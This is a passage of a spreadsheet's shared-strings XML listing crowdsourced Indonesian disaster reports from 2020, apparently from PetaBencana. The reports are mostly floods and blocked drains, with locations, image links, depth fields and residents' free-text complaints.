    <t>Padang</t>
  </si>
  <si>
    <t>Sumatera Barat</t>
  </si>
  <si>
    <t>17c9394a-4516-4fc3-ac20-693e728750a4</t>
  </si>
  <si>
    <t>Saya dapat di berita https://www.topsatu.com/padang-dilanda-hujan-lebat-drainase-perumahan-elit-bak-kolam-renang/</t>
  </si>
  <si>
    <t>Ulak Karang Utara</t>
  </si>
  <si>
    <t>Padang Utara</t>
  </si>
  <si>
    <t>fdff53e6-0e6a-43a0-98eb-c2654191192f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fdff53e6-0e6a-43a0-98eb-c2654191192f.jpg</t>
  </si>
  <si>
    <t>Saya dikirimi video oleh teman sekampus.</t>
  </si>
  <si>
    <t>Air Tawar Barat</t>
  </si>
  <si>
    <t>179d2537-a33a-4746-a5ed-6faa1975b962</t>
  </si>
  <si>
    <t>https://images.petabencana.id/179d2537-a33a-4746-a5ed-6faa1975b962.jpg</t>
  </si>
  <si>
    <t>Saya dapat di berita bahwa daerah Arai Pinang banjir. http://fixpadang.pikiran-rakyat.com/padang/pr-40589501/hujan-lebat-guyur-padang-sejum</t>
  </si>
  <si>
    <t>Batuang Taba Nan Xx</t>
  </si>
  <si>
    <t>Lubuk Begalung</t>
  </si>
  <si>
    <t>227371ae-5526-40ea-b70b-972736efc0fa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/227371ae-5526-40ea-b70b-972736efc0fa.jpg</t>
  </si>
  <si>
    <t>Daerah Jalan Jhoni Anwar, Padang. https://fixpadang.pikiran-rakyat.com/padang/pr-40589501/hujan-lebat-guyur-padang-sejumlah-titik-banjir</t>
  </si>
  <si>
    <t>Kampung Lapai Baru</t>
  </si>
  <si>
    <t>Nanggalo</t>
  </si>
  <si>
    <t>f895786c-3153-4368-996c-fa3e8ec83356</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f895786c-3153-4368-996c-fa3e8ec83356.jpg</t>
  </si>
  <si>
    <t>Banjir terjadi setelah hujan deras yang disertai petir dari kira kira jam 7 pagi hingga jam 11 siang beberapa kawasan terendam banjir</t>
  </si>
  <si>
    <t>Pelaihari</t>
  </si>
  <si>
    <t>Tanah Laut</t>
  </si>
  <si>
    <t>07583b15-570f-4400-b184-ff5a84f4e1a1</t>
  </si>
  <si>
    <t>Tidak dapat menyertakan gambar, karena banjir terjadi pada malam hari</t>
  </si>
  <si>
    <t>Kasimbong</t>
  </si>
  <si>
    <t>Masamba</t>
  </si>
  <si>
    <t>Luwu Utara</t>
  </si>
  <si>
    <t>4e2b2a5e-da14-4443-a5df-7e6b7d24d2ee</t>
  </si>
  <si>
    <t>Hujan dari Magrib gerimis tapi merata</t>
  </si>
  <si>
    <t>Sungai Buah</t>
  </si>
  <si>
    <t>Ilir Timur Ii</t>
  </si>
  <si>
    <t>Palembang</t>
  </si>
  <si>
    <t>a04007aa-a115-413e-aed1-f77a086868e0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a04007aa-a115-413e-aed1-f77a086868e0.jpg</t>
  </si>
  <si>
    <t>banjir bandang di Radda, Masamba Luwu Utara, Sulawesi Selatan</t>
  </si>
  <si>
    <t>Bone</t>
  </si>
  <si>
    <t>27d98456-f6d0-4b35-9e26-117212320834</t>
  </si>
  <si>
    <t>Banjir luwu utara 13 juli 2020 20.00 wita</t>
  </si>
  <si>
    <t>Baebunta</t>
  </si>
  <si>
    <t>aa1d8d25-e9f8-4a4d-9f38-62f998d13bb0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aa1d8d25-e9f8-4a4d-9f38-62f998d13bb0.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 185 }</t>
  </si>
  <si>
    <t>Jam 12.20 saat ini naik beberapa cm lagi... Desa Melamut Bersatu Kecamatan Pinoh Utara Kabupaten Melawi</t>
  </si>
  <si>
    <t>Tanjung Niaga</t>
  </si>
  <si>
    <t>Nanga Pinoh</t>
  </si>
  <si>
    <t>Melawi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/H-lAlOS8RxBmcTtk4PPzEHQHPr_AajcbOK6yQZgOI0MKm-mfwe3GLjCCtEl4b_HjmBCAO2_l7xDShhk4ONdlJhdGn3oC=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "237", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir. Got perlu diperdalam.</t>
  </si>
  <si>
    <t>293bc53b-8271-475b-ac54-b025798c5ec6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/293bc53b-8271-475b-ac54-b025798c5ec6.jpg</t>
  </si>
  <si>
    <t>Banjir disertai lumpur tebal setinggi lebih dari satu meter</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lJK32-OaAhXfMnzEw58CulGpk-SX8XwREvN_KyzKFqxofY6L8KQ_VheAhCyXzFPUcNzMohCJdlAwSjbkgMYSWgTPGAn1Rw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "137", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>arena bermain pademi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Jo-ddeww52orf1pSLhV1K49tXB9uYN7jEfhckLn7kuxv4zjXgZIpXNvCy4bdwvmnIg7rI_kttLPost_DGrxEtp_wyLq7=s480-c</t>
  </si>
  <si>
    <t>ok</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/8pjyL1rDtLU31wN2IQfornoRxFqRlHuOfP08TDPx4qBbhIbFYqBNExt9_vHBb8sQEVT0M3DbyD9jZwbiQU0Z0hOV8jsgYA=s480-c</t>
  </si>
  <si>
    <t>keadaan saat tiap hujan</t>
  </si>
  <si>
    <t>e3053ebf-d33e-47a2-ba09-ad6083e841b1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3053ebf-d33e-47a2-ba09-ad6083e841b1.jpg</t>
  </si>
  <si>
    <t>Banjir dari sungai masamba. Luwu Utara.Sulsel.Pemukiman tengah kota diterjang lumpur dini hari jam 01.00..</t>
  </si>
  <si>
    <t>011d02b6-d43c-4980-8890-4d4e17190119</t>
  </si>
  <si>
    <t>https://images.petabencana.id/011d02b6-d43c-4980-8890-4d4e17190119.jpg</t>
  </si>
  <si>
    <t>ad427b62-89e8-4f5d-966c-251f76aae96f</t>
  </si>
  <si>
    <t>Habis gerimis</t>
  </si>
  <si>
    <t>Cibiru Hilir</t>
  </si>
  <si>
    <t>f54e8533-9d6d-49de-bd5a-cbe2b26bb974</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f54e8533-9d6d-49de-bd5a-cbe2b26bb974.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 174 }</t>
  </si>
  <si>
    <t>Akses jalan arah Palopo-Masamba lewat Kariango Baebunta, dari arah Lutim lewat lingkar selatan. Pengungsian Wil Radda di Pannampungang belok</t>
  </si>
  <si>
    <t>97df82ca-89a9-465a-b483-28edac44854b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/97df82ca-89a9-465a-b483-28edac44854b.jpg</t>
  </si>
  <si>
    <t>Banjir yg terjadi pada tgl 13 juli 2020, longsor dari gunung menyebabkan sungai di masamba meluap sehingga membanjiri rumah warga</t>
  </si>
  <si>
    <t>91d51ef5-0450-45fe-aeb5-e395caaa9fd5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/91d51ef5-0450-45fe-aeb5-e395caaa9fd5.jpg</t>
  </si>
  <si>
    <t>13-7-2020 Masamba, Luwu Utara, Sulsel terdampak banjir. Bukan air yang tergenang melainkan lumpur yang menutupi rumah.</t>
  </si>
  <si>
    <t>380f94f6-42f9-431d-882a-1a19abde3bbd</t>
  </si>
  <si>
    <t>https://images.petabencana.id/380f94f6-42f9-431d-882a-1a19abde3bbd.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 197 }</t>
  </si>
  <si>
    <t>Terjadi banjir bandang di kecamatan masamba kab Luwu Utara. Dimana ketinggian banjir dan lumpur diprediksi hampir 4 meter</t>
  </si>
  <si>
    <t>2855116a-e0ec-4602-9a1f-ae5abec53f59</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2855116a-e0ec-4602-9a1f-ae5abec53f59.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-PB" }</t>
  </si>
  <si>
    <t>Rufei</t>
  </si>
  <si>
    <t>Sorong Barat</t>
  </si>
  <si>
    <t>Sorong</t>
  </si>
  <si>
    <t>Papua Barat</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lf3i9Q7lkRGQsiU2bnBwTVTZMBFDkYIej7_rhaX0NTU95-PLTjg6Y8oipVN5RDHMHfXx_iah31JHbxJgbrj0sQf-f4Ak=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1635", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tolong pemerintah/petugas yg berwenang untuk memperbaiki turap kali yg jebol di belakang smip sahid karena beresiko meluap saat hujan besar dan pemukiman warga rt.016/06 #KaliMeluap #TurapJebol</t>
  </si>
  <si>
    <t>Susukan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/-a2VtrXLOa67GuGGJ6qq3-LvDOMfRMht9wD9kSU3IJvKddN7spjg0h2lXESCMR_0VnulMlvEwEgdNbR7uyYCoKB3DsQ=s480-c</t>
  </si>
  <si>
    <t>70490219-3764-4291-bd77-f64ebf70a666</t>
  </si>
  <si>
    <t>Sorong banjir mereka setelah di guyur lebat kurang lebih 4jam 17.00-21.00</t>
  </si>
  <si>
    <t>76b6710c-2f39-4316-bf8c-d125cf780807</t>
  </si>
  <si>
    <t>https://images.petabencana.id/76b6710c-2f39-4316-bf8c-d125cf780807.jpg</t>
  </si>
  <si>
    <t>Banjir besar melanda sebagian besar kota sorong pada 16 juli 2020</t>
  </si>
  <si>
    <t>Matalamagi</t>
  </si>
  <si>
    <t>Sorong Utara</t>
  </si>
  <si>
    <t>06532540-055f-47b3-a659-fa2d6f926b09</t>
  </si>
  <si>
    <t>https://images.petabencana.id/06532540-055f-47b3-a659-fa2d6f926b09.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2212", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Sudah Seminggu banjir pasang dimulai bada magrib di rumah sendiri. Apakah ini karena Air pasang, Selokan Mampet, atw kali meluap?</t>
  </si>
  <si>
    <t>Rawabadak Utara</t>
  </si>
  <si>
    <t>c0616e00-462e-4a3f-91c2-8ff899275ed1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/c0616e00-462e-4a3f-91c2-8ff899275ed1.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 0, "condition": 1 }</t>
  </si>
  <si>
    <t>Rusak ringan</t>
  </si>
  <si>
    <t>Gowongan</t>
  </si>
  <si>
    <t>Jetis</t>
  </si>
  <si>
    <t>6c7a44dd-dc44-4c5b-b479-c95f6e0696b9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6c7a44dd-dc44-4c5b-b479-c95f6e0696b9.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "road", "accessabilityFailure": 1, "condition": 2 }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1336", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DVVmwNGJ3UJi0klgfZ-dW0PJycXpxMIyLl4SV-FmYTT2b4cN_dFDd-U2Bsz2CewXMjzHTb6Eq58S5Fxyk6MjJClon4-v=s480-c</t>
  </si>
  <si>
    <t>@PPSU Maphar</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/MUXOLPuZacaHuR1u_XvaKog00gE6bU7FLJ9rhfcBPUOtaCjWSnyjZsyfgs3hdxD_nIOX_SlUrTt1wZxoJ0Q6XDGYfrnYyQ=s480-c</t>
  </si>
  <si>
    <t>Sampah Lumut Hingga Berkerak di perempatan Kebon jeruk 6. Maphar</t>
  </si>
  <si>
    <t>699eaef8-febf-459b-bbd9-710a127fa6f4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/699eaef8-febf-459b-bbd9-710a127fa6f4.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-KT" }</t>
  </si>
  <si>
    <t>Banjir sudah terjadi dikabupaten kotawaringin barat, banjir terus saja naik selain karena air sungai yang meluap juga karena banyak lahan ga</t>
  </si>
  <si>
    <t>Raja</t>
  </si>
  <si>
    <t>Arut Selatan</t>
  </si>
  <si>
    <t>Kotawaringin Barat</t>
  </si>
  <si>
    <t>Kalimantan Tengah</t>
  </si>
  <si>
    <t>f1326bc4-79cd-421a-b9ef-5630b7786336</t>
  </si>
  <si>
    <t>Banjir menggenangi rumah serta mobil-mobil yang di parkir di pinggir jalan</t>
  </si>
  <si>
    <t>5fffc5ba-0fbb-433e-8cd3-4415f9408b3e</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 199 }</t>
  </si>
  <si>
    <t>Banjirr</t>
  </si>
  <si>
    <t>Kelurahan Batu Papan</t>
  </si>
  <si>
    <t>Makale</t>
  </si>
  <si>
    <t>Tana Toraja</t>
  </si>
  <si>
    <t>973beab4-8270-4efe-81e5-c0247177fcdc</t>
  </si>
  <si>
    <t>Jalan sepanjang Kotawaringin Lama menuju Pangkalan Bun banjir karena air sungai meluap dan intensitas hujan yang tinggi.</t>
  </si>
  <si>
    <t>Kotawaringin Hilir</t>
  </si>
  <si>
    <t>Kotawaringin Lama</t>
  </si>
  <si>
    <t>93bc92d0-bd79-4d8e-ac4d-0d3086b1c448</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93bc92d0-bd79-4d8e-ac4d-0d3086b1c448.jpg</t>
  </si>
  <si>
    <t>Banjir di balikpapan utara, komplek perumahan sosial batu ampar jalan pattimura</t>
  </si>
  <si>
    <t>Balikpapan Utara</t>
  </si>
  <si>
    <t>5596f2e3-c71e-4d16-9451-de3325e1e1b4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5596f2e3-c71e-4d16-9451-de3325e1e1b4.jpg</t>
  </si>
  <si>
    <t>Damai</t>
  </si>
  <si>
    <t>25dd49b3-b483-4f5c-ba44-d07f4f06f95a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/25dd49b3-b483-4f5c-ba44-d07f4f06f95a.jpg</t>
  </si>
  <si>
    <t>Banjir melanda sebagian Besar Kabupaten Aceh Selatan. Kawasan yang paling parah diterjang banjir adalah Kecamatan Kota Bahagia dan Trumon</t>
  </si>
  <si>
    <t>Pasi Lembang</t>
  </si>
  <si>
    <t>Kluet Selatan</t>
  </si>
  <si>
    <t>Aceh Selatan</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/1-WsryxCBdFaig-BfIDbNiQ7sAjDThiXYB8rzvy2oFN1wMiDalaACYUmMoXs1Lvar4OlqlwNa9skjXZoV4p9aPH8FVAe=s480-c</t>
  </si>
  <si>
    <t>Jorok. Bau. Sebelah gg Delecious Bakery</t>
  </si>
  <si>
    <t>1df71727-8296-4ccb-9f3e-27885a054bad</t>
  </si>
  <si>
    <t>https://images.petabencana.id/1df71727-8296-4ccb-9f3e-27885a054bad.jpg</t>
  </si>
  <si>
    <t>Flood cause of huge rain at night.</t>
  </si>
  <si>
    <t>Pasiran</t>
  </si>
  <si>
    <t>Singkawang Barat</t>
  </si>
  <si>
    <t>Singkawang</t>
  </si>
  <si>
    <t>9682c9fa-e226-44b2-a4c0-a9b62dbf5cab</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9682c9fa-e226-44b2-a4c0-a9b62dbf5cab.jpg</t>
  </si>
  <si>
    <t>{ "district_id": null, "local_area_id": null, "instance_region_code": "ID-ST" }</t>
  </si>
  <si>
    <t>Telah Terjadi banjir Setinggi Dada Orang dewasa didesa Dondo, desa Resarna,desa Giwang Kec. Balantak Selatan, Kab. Banggai, Sulawesi Tengah.</t>
  </si>
  <si>
    <t>Dondo</t>
  </si>
  <si>
    <t>Balantak Selatan</t>
  </si>
  <si>
    <t>Banggai</t>
  </si>
  <si>
    <t>Sulawesi Tengah</t>
  </si>
  <si>
    <t>fadda815-57c2-4770-8616-e7ee50556a50</t>
  </si>
  <si>
    <t>https://images.petabencana.id/fadda815-57c2-4770-8616-e7ee50556a50.jpg</t>
  </si>
  <si>
    <t>Banjir sepanjang jalan permata</t>
  </si>
  <si>
    <t>Labuh Baru Barat</t>
  </si>
  <si>
    <t>Payung Sekaki</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DC-hn6D7GZX3UOPG2vcgSB1dcX-B-R9v5aTDQIK2K3m7KzY5fQM_SHGsuTO4NfsaNPAdv2AjyVww9mQOH2Jz0wj9m-E=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "123", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>asssalamualakum tlng skpd terkait sda saluran lumpur nya sudah penun dikeruk lok.rw.10 tks</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/mScIkUHofjn64KxjmbW04raDPdugk9NdwVk0F6irNKeippBIctjzjG-l06FT587_F9uzp0zchY_MUk5XLqL9UkGwSfas=s480-c</t>
  </si>
  <si>
    <t>Air got tidak mengalir sudah lama dan air tergenangi terus dan makin tinggi sehingga bau dan banyak nyamuk. Sudah complaint dan petugas bilang di depan gang ada kabel besar di got sehingga menghalangi aliran air. Dan akan di koordinasi supaya kabel di be</t>
  </si>
  <si>
    <t>387313aa-5d94-4547-aa69-11ceb7b81fca</t>
  </si>
  <si>
    <t>https://images.petabencana.id/387313aa-5d94-4547-aa69-11ceb7b81fca.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "666", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Flood report</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ljsD_lsKnsJDFsHL6HQrT5NoY99sBI0ASVYmW2wk0tQsVFTIvnYTuNUZnL942ZfMGitdMsJHK-PYEuj4OZD8v7zHzKGwdQ=s480-c</t>
  </si>
  <si>
    <t>beginilah klo lagi hujan turun d depan BBG pinang Ranti,selalu banjir , mohon d tindak lanjutin  dari pihak yg terkait....</t>
  </si>
  <si>
    <t>2273662f-28ca-4bdd-9b36-cc7bdf8342ac</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2273662f-28ca-4bdd-9b36-cc7bdf8342ac.jpg</t>
  </si>
  <si>
    <t>Sukaramai I</t>
  </si>
  <si>
    <t>Medan Area</t>
  </si>
  <si>
    <t>Medan</t>
  </si>
  <si>
    <t>930335c9-cec2-469c-9a3c-2a153c736cfe</t>
  </si>
  <si>
    <t>Banjeeeeeeeeeerrrr</t>
  </si>
  <si>
    <t>Teladan Barat</t>
  </si>
  <si>
    <t>Medan Kota</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/DuQiKOwqlXbScCIZksWg2hDIOj4UkejlFEzOeuEUT4OmVMID9YtmmNiklBQnaPHJMzayA5U2zW6G58-YR6peS3pFnIw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "267", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir paray di jl anggrek nelly murni</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GHsqm9l16bL4pJL6xFXvnoqPD4ZO9Sm3ZLwPqkjSsjvboj_xESD6IEb4oTl5yvO_BhYKjcRLSBBvHMWg09tQ9zGrM5BL=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "430", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eWIE7x9Su5o_6pLvKay-oP0J-RMRqTSCto9aieDF64gDXpZPenHNGFboMmDPBVwfVCtySgrIVC5fn92MN3h-SSBPlYkTrQ=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang beberapa bulan lalu saya sudah melaporkan besi penyangga sampahnya bengkok tapi ga ada tindakan, akhirnya baru hujan sebentar langsung jebol . banjir air hitam masuk ke rumah warga dalam hitungan menit. lokasi di"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/yfaKlMI7aswQombM32LjXPSjnd40pVXzXLKqdDkMuyEaG6vZGlO3Exm4kzyMW6-FfcYT4pWeaxVmDMy-cvD36PcsG3wx=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "2333", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#BanjirKecil#saluranMampet#tak kunjung ada solusi.. harus bongkar saluran..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/cZgicSOH0mpAOxAJ3wcRC-YPUA30xFOtisZbsG-zYbGGVZb855BUgIQhz-BvKmk_zvJh2MArQgZlgmemXGgtIqaIl-1f=s480-c</t>
  </si>
  <si>
    <t>hujan sebentar banjir</t>
  </si>
  <si>
    <t>0db1eb81-0264-4440-8e0f-37c34a02c450</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0db1eb81-0264-4440-8e0f-37c34a02c450.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "1624", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/kFFCEHqflaXaVntLglpnCyumz3XhUn3Ck5V5j1-M-tNWIJpDBwe-xGsuthR9BvWah8tJvodwiQqtUb1eDtB421wGC_7J=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3175", "local_area_id": "2372", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Wahana Wisata Baru. anak anak Rp.5.000 dewasa     Rp.10.000 Banjir sepanjang 540m Jl. Brantas Raya. Rw.01. Kel. Semper Barat. Cilincing  Jakarta Utara"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/clGKrBLGM1FylbjMboT1hVQnyqfiFh2FZDSocWxWR7jKjThqjHQg6wXBBRKnFveqZUmaHKgHEj5zj6MKEoWJEKrnoeSk=s480-c</t>
  </si>
  <si>
    <t>banjir lgi , tiap hujan banjir, aer kali luber, , sepertinya kali harus d tanggul, karena kali udh gk nampung debit air ktika hujan jd tiap hujan banjir #KaliMeluap lokasi RT06/06 jatipadang"</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/KAfdWRSEdLgtcUKpP2PBubB0sCu_viPXaxlpytWxbtjBXn6ytB4w30WRWYdM0kDqsPmsxFxRqaCFIFRJKmmldd9UxeA-AA=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1841", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tanggul jebol, dapat bikin banjir</t>
  </si>
  <si>
    <t>4cd4e01b-23db-4906-aab9-4d1df5bdbd29</t>
  </si>
  <si>
    <t>{ "report_type": "structure", "structureFailure": 0 }</t>
  </si>
  <si>
    <t>pakutandang</t>
  </si>
  <si>
    <t>Sigaracipta</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/bropjgPJ8Hli8ccHIsJweQWp2NX1yWL0hIsuWwvTSTAvbF2d8B0B738agTLuqvc4zKew9JkKzZH6EvSHPYJezuiZRtA=s480-c</t>
  </si>
  <si>
    <t>saluran tidak mengalir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/gO2eHgJG2uaG4nQw0YLk60LNHuXgvJSjJuq7id7n6H17GgTHxINV_HIB5TskoeRrxdnoNefus8CuCSLNOj4sxx5CGiDM=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "352", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>bisa bikin banjir</t>
  </si>
  <si>
    <t>Pinangsia</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Jdl0W1KBgpPAMQrZudKPpvjK89i_0CBpn4xge0jloAxYKzn7dJ4JXGIiohlt92EB72bNLgOvN4d-ZtKkJtB5d-hjDjZhBA=s480-c</t>
  </si>
  <si>
    <t>selamat pagi skpd terkait tolong saluran di depan mushola darussalam got nya blm ada penunup nya hanya pakai papan jika hujan selalu terbawa air /hanyut tlng di tindak lanjuti laporan ini terima kasuh</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ZbGcX5aYTmRtwFaxxqxY7kf5e3aZIylXyEKodeYhfC8izF9nC5ntE9ZR2PD63wB5Lj3sApej9CclZzNDNkqbCXeOJTQ=s480-c</t>
  </si>
  <si>
    <t>perlu dikeruk lumpur gotnya</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/nYwVei3jeQUtCDpyzTlai08lzNd6mDd74dH8xtZCfDrAMrEpsaGLBHX91Ms6HJP_YwWIHDd8JX2fwI6mJ5YXJ4iGt4tlyg=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "371", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>sering terjadi motor jatuh..  karna petugas nya gak mau ngebersihin bekas air sampah nya..</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/eeqbcJLcKIwSfcFitqN5Dk0C111Z_BOm9G2yXdFEbzhJPnqDICTmppObFWtS1fg_13k4oXVHNOPvJLE2wCWFVozIXJAXTg=s480-c</t>
  </si>
  <si>
    <t>lumpur selokan 90% buat SDA grebek lumpur dikelurahan semper barat sudah pernah di tl tapi abal2 x ini jangan bohongi kami.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/r_qx4VPp61paUPAtN5xWsYiJx5OUnzw1teKiyUMTR1_FZNzAe8HdKmFJ1VGs7L_nk_0n-TdSYBi1b9wPol9hN2clFLIf7Q=s480-c</t>
  </si>
  <si>
    <t>belom di tl</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/ms7Y2sF4tQY_zhnTyGXhpR567k4b0HZowqe_FxOEDxOVFcFeghhG61PwyuaQSIkNE_P8zhyNVLt2XgmIzRCdD23wEoc=s480-c</t>
  </si>
  <si>
    <t>pedagang mi ayam bangka depan indomart/alfamart jl raya kebon jeruk tidak menggunakan masker saat berjualan . mohon pak camat dan jajaranya melakukan binaan 3M , khawatir mereka menularkan kopid19</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/GjfMnaiL0-qSl84IlURzSAZQ0a1MssYeQ7rr-i2Fap8E2gwtAPsMGX-KgHMY0J7_e1G72BXOSQ7k-JHc3SvxykZj1EJuyg=s480-c</t>
  </si>
  <si>
    <t>saluran air ditutup</t>
  </si>
  <si>
    <t>dfa39e2b-207f-4706-92a8-393e841257e3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/dfa39e2b-207f-4706-92a8-393e841257e3.jpg</t>
  </si>
  <si>
    <t>Gempa bumi 3,2 M, telah mengguncang kota sukabumi pada Jumat (4/9/2020), sekitar pukul 13.30 WIB. Mengakibatkan satu rumah ambruk"</t>
  </si>
  <si>
    <t>Tipar</t>
  </si>
  <si>
    <t>Citamiang</t>
  </si>
  <si>
    <t>Sukabumi</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/XZRnAHB1XC8_4556my0CdhGRDuQSw1ul2EV1mzK2HgTh57cXa17cGtn0S7QS8zvOdRrYCeretdztfgJdnFvegIrS_Ss=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "91", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>#KaliMeluap mohon bantuan jangka pendek yaitu mengangkat lumpur dan sampah dari saluran air. dan bantuan jangka panjang meninggikan jalan gang dan subsidi dana peninggian tempat tinggal."</t>
  </si>
  <si>
    <t>6a7bb63d-383d-48d1-b1d0-9a896d504249</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6a7bb63d-383d-48d1-b1d0-9a896d504249.jpg</t>
  </si>
  <si>
    <t>Tumbang Hejan</t>
  </si>
  <si>
    <t>Antang Kalang</t>
  </si>
  <si>
    <t>Kotawaringin Timur</t>
  </si>
  <si>
    <t>bd91e9ff-9e6f-483c-8f98-14a0cd77b84c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/bd91e9ff-9e6f-483c-8f98-14a0cd77b84c.jpg</t>
  </si>
  <si>
    <t>Airnya kotor bat comberan</t>
  </si>
  <si>
    <t>Melong</t>
  </si>
  <si>
    <t>Cimahi Selatan</t>
  </si>
  <si>
    <t>Cimahi</t>
  </si>
  <si>
    <t>56b2b095-7408-4b7b-8134-c036f6d40bc3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/56b2b095-7408-4b7b-8134-c036f6d40bc3.jpg</t>
  </si>
  <si>
    <t>air nya semakin tinggi perhari nya, ditengah pasar kota udah 70% terkena banjir, dan banyak rumah dipedalaman desa udah terendam banjir</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/al9LhQ-1dtRYB1K2B_JJpy-q_pFg6geHL__z99WzEVqE5l4xlFeAWDrvccmQMxDcGk8UyzUETOfxCbx1ELZW4__IuHQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1232", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>tergenang, ga ada saluran air nya</t>
  </si>
  <si>
    <t>Kebagusan</t>
  </si>
  <si>
    <t>ba7483ca-486c-4f21-8b11-4f446ffba08f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ba7483ca-486c-4f21-8b11-4f446ffba08f.jpg</t>
  </si>
  <si>
    <t>Banjir masih menggenangi sejumlah wilayah di Kabupaten Melaw"</t>
  </si>
  <si>
    <t>Akcaya</t>
  </si>
  <si>
    <t>Pontianak Selatan</t>
  </si>
  <si>
    <t>Pontianak</t>
  </si>
  <si>
